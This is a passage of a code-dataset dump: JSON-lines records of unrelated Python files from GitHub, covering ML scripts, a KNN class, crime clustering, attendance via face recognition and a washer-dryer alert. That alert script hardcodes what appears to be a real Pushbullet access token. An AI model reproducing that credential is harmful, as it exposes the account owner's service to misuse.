cl)\n","repo_name":"EuroPython/ep-helpdesk","sub_path":"helpdesk/tests/test_get_email.py","file_name":"test_get_email.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"163532298","text":"#import modules\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport os\nimport numpy as np\nfrom nltk.tokenize import word_tokenize \n\ndef convert_to_onehot( c ):\n tensor = np.zeros(128)\n tensor[ord(c)] = 1\n return tensor\n\ncode_tensors = []\nvocab = set()\ncomments_dict = {}\ncomments = []\ncode_vocab = set()\ncode_dict = {}\n\n\nfile_path = 'code'\nfor root,dirs,files in os.walk(file_path):\n for fl in files:\n code = open('code/'+fl).read()\n code_tensor = [x for x in code][:1000]\n for i in range(1000 - len( code_tensor )):\n code_tensor.append(' ')\n codes.append(code)\n code_words = np.asarray(word_tokenize(code)[:1000])\n for word in code_words:\n code_vocab.add(word)\n comment = open('comments/'+fl).read()\n for com in comment.split():\n vocab.add( com )\n comments.append( comment )\n\ni=0\nfor item in vocab:\n comments_dict[item]=i\n i=i+1\n\ni=0\nfor item in code_vocab:\n code_dict[item]=i\n i=i+1\n\ncomment_tensors_input = []\ncomment_tensors_target = []\n\nfor item in comments:\n comment_tensors = []\n comment = item.split()\n for i in range(10):\n comment_tensor = np.zeros(len(vocab))\n if(i < len(comment)):\n comment_tensor[comments_dict[comment[i]]] = 1\n comment_tensors.append(comment_tensor)\n comment_tensors_input.append(comment_tensors)\n comment_targets = comment_tensors[1:]\n comment_targets.append(np.zeros(len(vocab)))\n print(len(comment_targets))\n comment_tensors_target.append(comment_targets)\n\nfor item in codes:\n code_tensor = []\n code = word_tokenize(code)[:1000]\n for i in range(1000):\n code_tensor_local = np.zeros(len(code_vocab))\n if(i < len(code)):\n code_tensor_local[code_tensor[code[i]]] = 1\n code_tensor.append(code_tensor_local) \n code_tensors.append(code_tensor) \n \n\n\nprint(np.asarray(code_tensors).shape)\nprint(np.asarray(comment_tensors_input).shape)\nprint(np.asarray(comment_tensors_target).shape)\n\n\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, len(code_vocab)))\nencoder = LSTM(100, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, len(vocab)))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. 
We don't use the \n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(100, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n                                     initial_state=encoder_states)\ndecoder_dense = Dense(len(vocab), activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics = ['accuracy'])\n\nprint(model.summary())\nmodel.fit([np.asarray(code_tensors), np.asarray(comment_tensors_input)], np.asarray(comment_tensors_target),\n          batch_size=5,\n          epochs=100,\n          validation_split=0.2)\n\nmodel.save(\"encdec.h5\")","repo_name":"Milan-J-S/Code-Comprehension-MCQs","sub_path":"src/encdecwords.py","file_name":"encdecwords.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32436288128","text":"import numpy as np\nfrom collections import Counter\n\n\nclass KNN:\n    def __init__(self, k=3):\n        self.y_train = None\n        self.X_train = None\n        self.k = k\n\n    def fit(self, x, y):\n        self.X_train = x\n        self.y_train = y\n\n    def predict(self, X):\n        predictions = [self._predict(x) for x in X]\n        return predictions\n\n    def _predict(self, x):\n        distances = [euclideanDistance(x, x_train) for x_train in self.X_train]\n        k_indices = np.argsort(distances)[:self.k]\n        k_nearest_labels = [self.y_train[i] for i in k_indices]\n        most_common = Counter(k_nearest_labels).most_common(self.k)\n        if len(most_common) > 1 and most_common[0][1] == most_common[1][1]:\n            # tie: pick the tied label that appears earliest in the training labels\n            y_list = self.y_train.tolist()\n            top_count = most_common[0][1]\n            tied_labels = [label for label, count in most_common if count == top_count]\n            indices = [y_list.index(label) for label in tied_labels]\n            indices.sort()\n            return y_list[indices[0]]\n        else:\n            return most_common[0][0]\n\n\ndef euclideanDistance(x1, x2):\n    distance = np.sqrt(np.sum((x1 - x2)**2))\n    return distance\n","repo_name":"EsraaRgb/Machine-Learning-Algorithms-From-Scratch","sub_path":"KNN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12687749963","text":"import pymongo\n\nF = open('./noneUserInfo11.list', 'a', encoding=\"utf-8\")\nclient = pymongo.MongoClient(host='localhost', port=27017)\ncxk = client.weibo.cxk\nqueryArgs = {\"gender\": None}\nprojectionFields = {'id': True}\nsearchRes = cxk.find(queryArgs, projection=projectionFields)\n\n# materialize the cursor once; it cannot be consumed a second time\nresults = list(searchRes)\nfor i,item in enumerate(results):\n    print(item['id'],file=F)\n\nprint(\"remaining:\", len(results))\n","repo_name":"sherwin/WeiboFansSpider","sub_path":"checkNoneUserInfo.py","file_name":"checkNoneUserInfo.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26680320460","text":"import Adafruit_ADS1x15\nimport time\nfrom enum import Enum\nimport numpy as np\nfrom pushbullet_alert import pushbullet\n\nadc = Adafruit_ADS1x15.ADS1115()\n\nTHRESHOLD = 2000\n\nclass washer_dryer_state(Enum):\n    ON = 1\n    OFF = 0\nstate = washer_dryer_state.OFF \n\nsamples = np.array([])\nSAMPLE_SIZE = 200\n\ndef getNoise():\n    start = time.time()\n    smax = 0\n    smin = 1000000\n    while time.time()-start<.05:\n        sample = adc.read_adc(0,gain=1)\n        if sample > smax:\n            smax = sample\n        if sample < smin:\n            smin = sample\n    amplitude = 
smax-smin\n return amplitude\n\nalerter = pushbullet('o.tbcN3E8kIcVJ7z7QYNOg4LovZFLdsF4x')\n\nwhile True:\n samples = np.append(samples,getNoise())\n if len(samples) > SAMPLE_SIZE:\n samples = np.delete(samples,0)\n moving_average = np.mean(samples)\n #print(moving_average)\n \n if moving_average > THRESHOLD and state is washer_dryer_state.OFF: # if the washer is on change the state\n state = washer_dryer_state.ON\n #alert user the washer is on\n alerter.send_alert('washer-dryer on!')\n #print('Washer On!')\n elif moving_average < THRESHOLD and state is washer_dryer_state.ON: # if the state is on but it turned off then switch the state and alert the user\n state = washer_dryer_state.OFF\n #print('Washer Off!')\n alerter.send_alert('washer-dryer finished!')\n\n","repo_name":"PrateekHumane/washer_dryer_alert","sub_path":"washer_dryer_alert.py","file_name":"washer_dryer_alert.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25159571812","text":"import argparse\nimport os\n\nimport jinja2\n\nfrom usbgen import usb\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"input jinja template\")\n parser.add_argument(\"-o\", \"--output\", help=\"output file\")\n args = parser.parse_args()\n\n path, filename = os.path.split(args.input)\n template = jinja2.Environment(\n loader=jinja2.FileSystemLoader(path or './'),\n keep_trailing_newline=True,\n ).get_template(filename)\n\n template.globals['usb'] = usb\n\n output = template.render()\n\n if args.output is not None:\n outputf = open(args.output, \"w\")\n outputf.write(output)\n outputf.close()\n else:\n print(output)\n","repo_name":"domenipavec/usbgen","sub_path":"usbgen/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735453213","text":"from numpy.random import seed\nimport GPyOpt\nimport os\nimport string\nimport multiprocessing\nimport numpy as np\nimport json\nimport argparse\n\nclass NumPyArangeEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.int64):\n return int(obj)\n if isinstance(obj, np.float64):\n return float(obj)\n if isinstance(obj, np.int32):\n return int(obj)\n if isinstance(obj, np.float32):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist() # or map(int, obj)\n return json.JSONEncoder.default(self, obj)\n\n\n# Global variables\nopt_cmd = string.Template(\"kgcn --config ${config} train ${args}\")\ndomain = [\n {'name': 'num_gcn_layer', 'type': 'discrete', 'domain': (0, 1, 2, 3, 4), \"data_type\": \"int\"},\n {'name': 'layer_dim0', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim1', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim2', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim3', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'add_dense0', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense1', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense2', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense3', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'num_dense_layer', 'type': 'discrete', 'domain': (0, 1, 2), \"data_type\": \"int\"},\n {'name': 'layer_dense_dim0', 'type': 'continuous', 'domain': (0.5, 3)},\n 
{'name': 'layer_dense_dim1', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'learning_rate', 'type': 'continuous', 'domain': (0, 0.001)},\n {'name': 'batch_size', 'type': 'discrete', 'domain': (10, 50, 100), \"data_type\": \"int\"},\n {'name': 'dropout_rate', 'type': 'continuous', 'domain': (0, 0.9)},\n ]\nseed(123)\nopt_path = None\nopt_arg = \"\"\nconfig = None\ncounter = 0\n# multiprocess is not supported\nbatch_size = 1\nnum_cores = 1\n#\n\n\ndef save_json(path, obj):\n print(\"[SAVE] \", path)\n with open(path, \"w\") as fp:\n json.dump(obj, fp, indent=4, cls=NumPyArangeEncoder)\n\n\ndef load_json(path):\n print(\"[LOAD] \", path)\n with open(path, 'r') as fp:\n obj = json.load(fp)\n return obj\n\n\ndef update_config(path, config, fid, key):\n if key in config:\n config[key] = os.path.join(path, os.path.basename(config[key]))\n\n\ndef make_config(path, config, fid):\n config[\"param\"] = os.path.join(path, \"param.json\")\n config[\"save_info_valid\"] = os.path.join(path, \"result.json\")\n config[\"save_model\"] = os.path.join(path, f\"model.{str(fid)}.ckpt\")\n config[\"load_model\"] = os.path.join(path, f\"model.{str(fid)}.ckpt\")\n config[\"save_model_path\"] = path\n ###\n config[\"plot_path\"] = path\n update_config(path, config, fid, \"save_info_train\")\n update_config(path, config, fid, \"save_info_test\")\n update_config(path, config, fid, \"save_result_train\")\n update_config(path, config, fid, \"save_result_test\")\n update_config(path, config, fid, \"save_result_valid\")\n ###\n return config\n\n\ndef fx(x):\n # worker=multiprocessing.current_process()._identity\n global counter\n global config\n fid = counter\n counter += 1\n\n # build config\n config = config\n opt_config_path = os.path.join(opt_path, f\"config.{str(fid)}.json\")\n path = os.path.join(opt_path, f\"trial{fid:03d}\")\n opt_result_path = os.path.join(path, \"result.json\")\n os.makedirs(path, exist_ok=True)\n # save config and save parameters\n config = make_config(path, config, fid)\n param = {}\n for i, el in enumerate(domain):\n param[el[\"name\"]] = x[0, i]\n if el[\"name\"] in config:\n print(el[\"name\"], \"<=\", x[0, i])\n if \"data_type\" in el and el[\"data_type\"] == \"int\":\n config[el[\"name\"]] = int(x[0, i])\n else:\n config[el[\"name\"]] = x[0, i]\n save_json(opt_config_path, config)\n save_json(config[\"param\"], param)\n\n # exec command\n context = {\"config\": opt_config_path, \"args\": opt_arg}\n cmd = opt_cmd.substitute(context)\n print(\"cmd:\", cmd)\n os.system(cmd)\n\n # get result\n result = load_json(opt_result_path)\n\n return result[\"validation_cost\"]\n\n\ndef main():\n global opt_path\n global config\n global opt_arg\n global domain\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', type=str, default=None, nargs='?', required=True,\n help='config json file')\n parser.add_argument('--max_itr', type=int, default=3,\n help='maximum iteration')\n parser.add_argument('--opt_path', type=str, default=\"opt/\",\n help='path')\n parser.add_argument('--domain', type=str, default=None,\n help='domain file')\n parser.add_argument('--gpu', type=str, default=None,\n help='[kgcn arg]')\n parser.add_argument('--cpu', action='store_true',\n help='[kgcn arg]')\n args = parser.parse_args()\n\n config = load_json(args.config)\n\n opt_arg += f\" --gpu {args.gpu}\" if args.gpu else \"\"\n opt_arg += f\" --cpu\" if args.cpu else \"\"\n\n print(\"... 
preparing optimization\")\n # make directory\n opt_path = args.opt_path\n os.makedirs(opt_path, exist_ok=True)\n # load domain\n if args.domain is not None:\n domain = load_json(args.domain)\n print(\"... starting optimization\")\n opt = GPyOpt.methods.BayesianOptimization(f=fx,\n domain=domain,\n batch_size=batch_size,\n num_cores=num_cores)\n opt.run_optimization(max_iter=args.max_itr)\n\n print(\"... saving optimization result\")\n n = opt.X.shape[0]\n result = []\n for i in range(n):\n param = {}\n for j, el in enumerate(domain):\n param[el[\"name\"]] = opt.X[i, j]\n y = opt.Y[i, 0]\n result.append({\"param\": param, \"cost\": y})\n out_result_path = os.path.join(opt_path, \"opt_result.json\")\n save_json(out_result_path, result)\n opt_index = np.argmin(opt.Y[:, 0])\n\n # save optimized parameters\n print(\"... saving optimized parameters\")\n param = {}\n for j, el in enumerate(domain):\n param[el[\"name\"]] = opt.x_opt[j]\n print(f\"optimized parapeter: {param}\"\n f\"cost: {opt.fx_opt}\"\n f\"index: {opt_index}\")\n param[\"opt_index\"] = int(opt_index)\n out_path = os.path.join(opt_path, \"opt_param.json\")\n save_json(out_path, param)\n\n # save optimized config\n print(\"... saving config\")\n fid=int(opt_index)\n path = os.path.join(opt_path, f\"trial{fid:03d}\")\n config[\"load_model\"] = os.path.join(path, f\"model.best.ckpt\")\n opt_config_path = os.path.join(opt_path, f\"opt_config.json\")\n save_json(opt_config_path, config)\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"opt_hyperparam.py","file_name":"opt_hyperparam.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"70528027434","text":"\"\"\"\n\nImplement a function reverse which reverses a null-terminated string.\n\n\n\"\"\"\n\n\nimport unittest\n\n\ndef reverse_recursion(st):\n if st != \"\":\n return st[-1:] + reverse_recursion(st[:-1])\n else:\n return \"\"\n\n\ndef reverse_st(st):\n return st[::-1]\n\n\n\n\nclass TEST(unittest.TestCase):\n\n TEST_DATA = [\n ['test', 'tset'],\n ['tsukamoto keisuke', 'ekusiek otomakust'],\n ['', ''],\n [' ', ' ']\n ]\n\n def test_both_reverse(self):\n for s, expected in self.TEST_DATA:\n self.assertEqual(reverse_recursion(s), expected)\n self.assertEqual(reverse_st(s), expected)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"garigari-kun/til","sub_path":"src/textbooks/ctci/ch1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39801688352","text":"import os\nimport tempfile\nimport pytest\nimport unittest\nfrom unittest.mock import MagicMock\nfrom PIL import Image\nfrom application.gui.media_viewer_fullscreen import MediaViewerGUI\nimport unittest.mock\n\n@pytest.fixture\ndef sample_media():\n with tempfile.TemporaryDirectory() as tmpdir:\n image_file = os.path.join(tmpdir, \"image.jpg\")\n\n with Image.new(\"RGB\", (10, 10)) as img:\n img.save(image_file)\n\n yield tmpdir\n\n@pytest.fixture\ndef media_viewer(sample_media):\n with unittest.mock.patch(\"tkinter.Tk.mainloop\"):\n viewer = MediaViewerGUI(sample_media, image_time=0.5)\n yield viewer\n viewer.exit_program(None)\n\ndef test_init(media_viewer):\n assert media_viewer is not None\n assert media_viewer.window_open\n\n#def test_exit_program(media_viewer):\n# with unittest.mock.patch.object(media_viewer, \"exit_program\", 
wraps=media_viewer.exit_program) as mock_exit_program:\n#        media_viewer.window.event_generate(\"\")\n#        media_viewer.window.update()\n#    \n#    mock_exit_program.assert_called_once()\n\ndef test_show_image(media_viewer, sample_media):\n    image_file = os.path.join(sample_media, \"image.jpg\")\n    media_viewer.show_image(image_file)\n    assert media_viewer.img_object is not None\n\n@pytest.mark.skip(reason=\"Testing video display requires testing the cv2 library, which is out of scope\")\ndef test_show_video(media_viewer):\n    pass","repo_name":"sperea/showcase-media-viewer-raspberrypi","sub_path":"application/gui/test_media_viewer_fullscreen.py","file_name":"test_media_viewer_fullscreen.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39139251831","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import MiniBatchKMeans\nfrom collections import Counter\nimport sys\n\ncrime_df = pd.read_csv('./crime/cleaned_crime_data.csv')\npd.set_option('display.max_columns', None)\n\ncrime_df = crime_df.dropna()\n\ncrime_p1 = crime_df[crime_df['UCR_PART'] == 'Part One']\ncrime_p2 = crime_df[crime_df['UCR_PART'] != 'Part One']\n\nNUM_CLUSTERS = int(sys.argv[1]) if len(sys.argv) > 1 else 5000\n\np1_ratio = int(float(len(crime_p1.index)) / float((len(crime_p1.index) + len(crime_p2.index))) * NUM_CLUSTERS)\np2_ratio = NUM_CLUSTERS - p1_ratio\n\ndef generate_cluster(df, num, name):\n    kmeans = MiniBatchKMeans(n_clusters=num).fit(list(zip(df.Long, df.Lat)))\n    centroids = kmeans.cluster_centers_\n    # count members per cluster, keeping counts aligned with the centroid order\n    label_counts = Counter(kmeans.labels_)\n    counts = [label_counts[i] for i in range(num)]\n    lng = []\n    lat = []\n    for i in centroids:\n        lng.append(i[0])\n        lat.append(i[1])\n    cluster_df = pd.DataFrame(list(zip(lng, lat, counts)), columns = ['Long', 'Lat', 'Size'])\n\n    print(cluster_df.head())\n    print(cluster_df.dtypes)\n    cluster_df.to_csv('./crime/clustered_crime_data_%s_%d.csv' % (name, NUM_CLUSTERS), index=False)\n\ngenerate_cluster(crime_p1, p1_ratio, 'p1')\ngenerate_cluster(crime_p2, p2_ratio, 'p2')\n","repo_name":"meguna/boston-crime","sub_path":"data/cluster_crime.py","file_name":"cluster_crime.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70051339432","text":"import cv2\nimport numpy as np\nimport face_recognition\nfrom datetime import datetime\nimport pandas as pd\n\n\ndef mark_attendance(name1):\n    with open('staticFiles/Attendance.csv', 'r+') as f:\n        my_data_list = f.readlines()\n        name_list = []\n        for line in my_data_list:\n            entry = line.split(',')\n            name_list.append(entry[0])\n        if name1 not in name_list:\n            now = datetime.now()\n            dt_string = now.strftime('%H:%M:%S')\n            dt_string_dt = now.date()\n            f.writelines(f'\\n{name1},{dt_string},{dt_string_dt}')\n\n\ndef main_function(path):\n    encoding = 'student_encodings.csv'\n    encodings = pd.read_csv(encoding)\n    encodings = encodings.drop('Unnamed: 0', axis=1)\n    encode = encodings.values.tolist()\n\n    name = 'student_names.csv'\n    names = pd.read_csv(name)\n    names = names.drop('Unnamed: 0', axis=1)\n    class_names = names.to_numpy()\n\n    img = cv2.imread(path)\n    img_s = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n    marked = []\n    faces_cur_frame = face_recognition.face_locations(img_s)\n    encodes_cur_frame = face_recognition.face_encodings(img_s, faces_cur_frame)\n    for encodeFace, faceLoc in zip(encodes_cur_frame, faces_cur_frame):\n        matches = face_recognition.compare_faces(encode, encodeFace)\n        face_dis = 
face_recognition.face_distance(encode, encodeFace)\n\n match_index = np.argmin(face_dis)\n\n print(class_names[match_index])\n if matches[match_index] > 0.99:\n name = class_names[match_index]\n mark_attendance(name)\n marked.append(name)\n now = datetime.now()\n dt_string = now.strftime('%H:%M:%S')\n dt_string_dt = now.date()\n return marked, dt_string, dt_string_dt\n","repo_name":"divyansh351/AttendanceSystem","sub_path":"mark_attendance.py","file_name":"mark_attendance.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2703868947","text":"import argparse\nimport copy\nimport os\nimport os.path as osp\nimport warnings\nimport random\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport time\n\ntic = time.time()\n# 1.14s\n\nimport sys\nsys.path.append('../..')\n\nsys.path.append('../mmcv')\n\nfrom UDL.AutoDL import build_model, getDataSession, ModelDispatcher\nfrom UDL.Basis.auxiliary import init_random_seed, set_random_seed\nfrom mmcv.utils.logging import print_log, create_logger\n# 1.5s\nfrom mmcv.runner import init_dist, find_latest_checkpoint\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner,\n Fp16OptimizerHook, OptimizerHook, build_optimizer,\n build_runner, get_dist_info)\n\n\n# 10s\n# from mmdet.datasets import (build_dataloader, build_dataset,\n# replace_ImageToTensor)\n\ndef trainer(cfg, logger,\n distributed=False,\n meta=None):\n\n model, criterion, optimizer, scheduler = build_model(cfg.arch, cfg.task, cfg)\n\n\n if hasattr(model, 'init_weights'):\n model.init_weights()\n\n\n sess = getDataSession(cfg)\n\n if cfg.eval:\n cfg.workflow = [('val', 1)]\n if not any('train' in mode for mode, _ in cfg.workflow):\n cfg.eval = True\n\n # put model on gpus\n if distributed:\n find_unused_parameters = cfg.get('find_unused_parameters', False)\n # Sets the `find_unused_parameters` parameter in\n # torch.nn.parallel.DistributedDataParallel\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False,\n find_unused_parameters=find_unused_parameters)\n else:\n if not hasattr(model, 'train'):\n if isinstance(model.model, dict):\n for name, m in model.model.items():\n model.model[name] = MMDataParallel(m, device_ids=cfg.gpu_ids)\n else:\n model.model = MMDataParallel(model.model, device_ids=cfg.gpu_ids)\n else:\n model = MMDataParallel(model, device_ids=cfg.gpu_ids)\n\n if cfg.get('optimizer', None) is not None:\n optimizer = build_optimizer(model, cfg.optimizer)\n\n if 'runner' not in cfg:\n cfg.runner = {\n 'type': 'EpochBasedRunner',\n 'max_epochs': cfg.epochs # argparser\n }\n warnings.warn(\n 'config is now expected to have a `runner` section, '\n 'please set `runner` in your config.', UserWarning)\n else:\n if 'epochs' in cfg and 'max_iters' not in cfg.runner:\n cfg.runner['max_epochs'] = cfg.epochs\n # assert cfg.epochs == cfg.runner['max_epochs'], print(cfg.epochs, cfg.runner['max_epochs'])\n\n runner = build_runner(\n cfg.runner,\n default_args=dict(\n model=model,\n optimizer=optimizer,\n work_dir=cfg.work_dir,\n logger=logger,\n meta=meta,\n opt_cfg={'print_freq': cfg.print_freq,\n 'accumulated_step': cfg.accumulated_step,\n 'clip_max_norm': cfg.clip_max_norm,\n 'dataset': cfg.dataset,\n 'img_range': cfg.img_range,\n 'metrics': cfg.metrics,\n 'save_fmt': cfg.save_fmt,\n 'mode': cfg.mode,\n 'eval': cfg.eval,\n 
'save_dir': cfg.work_dir + \"/results\"}))\n\n # an ugly workaround to make .log and .log.json filenames the same\n # runner.timestamp = timestamp\n\n # fp16 setting\n fp16_cfg = cfg.get('fp16', None)\n if fp16_cfg is not None:\n optimizer_config = Fp16OptimizerHook(\n **cfg.optimizer_config, **fp16_cfg, distributed=distributed)\n elif distributed and 'type' not in cfg.optimizer_config:\n optimizer_config = OptimizerHook(**cfg.optimizer_config)\n else:\n optimizer_config = cfg.get('optimizer_config', None)\n\n ############################################################\n # register training hooks\n ############################################################\n if cfg.get('config', None) is not None:\n '''\n optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)\n optimizer_config = dict(grad_clip=None)\n lr_config = dict(policy='step', step=[100, 150])\n checkpoint_config = dict(interval=1)\n log_config = dict(\n interval=100,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(type='TensorboardLoggerHook')\n ])\n '''\n runner.register_training_hooks(\n cfg.lr_config,\n optimizer_config,\n cfg.checkpoint_config,\n cfg.log_config,\n cfg.get('momentum_config', None),\n custom_hooks_config=cfg.get('custom_hooks', None))\n\n elif cfg.get('log_config', None) is None and len(cfg.workflow) and cfg.workflow[0][0] != 'simple_train':\n if cfg.mode == 'nni':\n runner.register_custom_hooks({'type': 'NNIHook', 'priority': 'very_low'})\n if scheduler is not None:\n runner.register_lr_hook(dict(policy=scheduler.__class__.__name__[:-2], step=scheduler.step_size))\n runner.register_checkpoint_hook(\n dict(type='ModelCheckpoint', indicator='loss', save_top_k=cfg.save_top_k, print_freq=cfg.save_print_freq))\n runner.register_optimizer_hook(dict(grad_clip=10)) # ExternOptimizer\n runner.register_timer_hook(dict(type='IterTimerHook'))\n log_config = [dict(type='TextLoggerHook')]\n if cfg.use_tfb:\n log_config.append(dict(type='TensorboardLoggerHook'))\n runner.register_logger_hooks(dict(\n interval=cfg.print_freq,\n hooks=log_config))\n\n else:\n runner.register_checkpoint_hook(dict(type='ModelCheckpoint', indicator='loss'))\n\n if distributed:\n if isinstance(runner, EpochBasedRunner):\n runner.register_hook(DistSamplerSeedHook())\n\n data_loaders = {}\n\n ############################################################\n # load data\n ############################################################\n\n for flow in cfg.workflow:\n mode, _ = flow\n if 'val' in mode:\n # cfg.dataset = cfg.dataset + '_OrigScale_multiExm1.h5'\n # cfg.dataset = cfg.dataset + '_multiExm1.h5'\n\n eval_loader, eval_sampler = sess.get_eval_dataloader(cfg.dataset[mode], distributed)\n\n eval_cfg = cfg.get('evaluation', {})\n eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'\n from mmcv.runner import EvalHook, DistEvalHook\n eval_hook = DistEvalHook if distributed else EvalHook\n # In this PR (https://github.com/open-mmlab/mmcv/pull/1193), the\n # priority of IterTimerHook has been modified from 'NORMAL' to 'LOW'.\n if mode != 'simple_val':\n runner.register_hook(\n eval_hook(eval_loader, **eval_cfg), priority='LOW')\n\n data_loaders[mode] = eval_loader\n # if len(cfg.workflow) == 0:\n # cfg.workflow.append(('val', 1))\n\n if 'train' in mode:\n train_loader, train_sampler = sess.get_dataloader(cfg.dataset[mode], distributed)\n if cfg.once_epoch:\n train_loader = iter(list(train_loader))\n data_loaders[mode] = train_loader\n\n if len(cfg.workflow) == 0:\n cfg.workflow.append(('simple_train', 1))\n 
############################################################\n # load model\n ############################################################\n\n resume_from = None\n if cfg.get('resume_from', None) is None and cfg.get('auto_resume'):\n resume_from = find_latest_checkpoint(cfg.work_dir)\n if resume_from is not None:\n cfg.resume_from = resume_from\n\n # if cfg.get('resume_from', None):\n runner.resume(cfg.resume_from, cfg.resume_mode, cfg.reset_lr, cfg.lr)\n if cfg.get('load_from', None) and cfg.get('resume_from', None) is not None:\n runner.load_checkpoint(cfg.load_from, cfg.resume_mode)\n\n ############################################################\n # run train/val/test\n ############################################################\n runner.run(data_loaders, cfg.workflow)\n\n\ndef main(cfg):\n # init distributed env first, since logger depends on the dist info.\n if cfg.launcher == 'none':\n distributed = False\n else:\n distributed = True\n init_dist(cfg.launcher, **cfg.dist_params)\n # re-set gpu_ids with distributed training mode\n _, world_size = get_dist_info()\n cfg.gpu_ids = range(world_size)\n\n logger, out_dir, model_save_dir, tfb_dir = create_logger(cfg, cfg.experimental_desc, 0)\n cfg.out_dir = cfg.work_dir = model_save_dir\n seed = init_random_seed(cfg.seed)\n print_log(f'Set random seed to {seed}', logger=logger)\n\n set_random_seed(seed)\n\n # if cfg.checkpoint_config is not None:\n # # save mmdet version, config file content and class names in\n # # checkpoints as meta data\n # cfg.checkpoint_config.meta = dict(\n # mmdet_version=__version__ + get_git_hash()[:7],\n # CLASSES=datasets[0].CLASSES)\n # add an attribute for visualization convenience\n\n trainer(\n cfg,\n logger,\n distributed=distributed,\n meta={})\n","repo_name":"liangjiandeng/DLPan-Toolbox","sub_path":"01-DL-toolbox(Pytorch)/UDL/AutoDL/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"69813798634","text":"import sys; sys.setrecursionlimit(100000)\ns= input()\nn= len(s)\n\n\ndef cal(lo,hi):\n if lo>hi:\n return ''\n if s[lo]=='(':\n for i in range(lo+1,hi+1):\n if s[i]==')':\n if i+1=0.01): \r\n key=1\r\n\r\nif(key==1):\r\n print('solution:',x,'The required accuracy is not reached after ',count,' iterations')\r\nelse:\r\n print('solution:',x,'iterations=',count)","repo_name":"nabendu96/Assignment_1","sub_path":"jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22874583689","text":"\"\"\"Implements ModelNormalGibbs.\"\"\"\n\nimport numpy as _nmp\nimport numpy.random as _rnd\n\nimport eQTLseq.utils as _utils\n\n\nclass ModelNormalVB(object):\n \"\"\"A normal model estimated using variational Bayes.\"\"\"\n\n def __init__(self, **args):\n \"\"\"TODO.\"\"\"\n n_genes, n_markers = args['n_genes'], args['n_markers']\n\n # initial conditions\n self.tau, self.tau_var = _nmp.ones(n_genes), _nmp.ones(n_genes)\n self.eta, self.eta_var = 